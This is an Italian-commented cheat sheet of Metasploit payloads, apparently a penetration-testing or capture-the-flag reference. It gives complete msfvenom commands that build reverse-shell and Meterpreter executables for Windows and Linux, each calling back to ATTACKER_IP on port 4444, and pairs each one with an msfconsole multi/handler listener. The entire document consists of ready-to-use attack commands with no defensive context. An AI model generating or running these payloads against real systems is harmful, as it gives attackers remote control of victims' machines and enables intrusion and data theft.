tags: payloads reverse_shell msfvenom
#Questo comando serve a creare un file con una reverse shell per Windows
msfvenom -p windows/shell/reverse_tcp -f exe LHOST=ATTACKER_IP LPORT=4444 -o shell.exe
#Questo è il suo relativo listener multi/handler
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/shell/reverse_tcp; set LHOST ATTACKER_IP; set LPORT 4444; exploit"
#Questo comando serve a generare una reverse shell per linux
msfvenom -p linux/x86/shell/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
#Questo è il suo relativo listener multi/handler
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/shell/reverse_tcp; set LHOST=ATTACKER_IP; set LPORT=4444; exploit"
#Questo serve a generare una reverse shell meterpreter per Windows
msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f exe -o meterpreter_shell.exe
#Questo è il suo relativo listener multi/handler
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST=ATTACKER_IP; set LPORT=4444; exploit"
#Questo comando serve a creare un file con una reverse shell meterpreter per Linux
msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=ATTACKER_IP LPORT=4444 -f elf -o shell.elf
#Questo è il suo relativo listener multi/handler
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST=ATTACKER_IP; set LPORT=4444; exploit"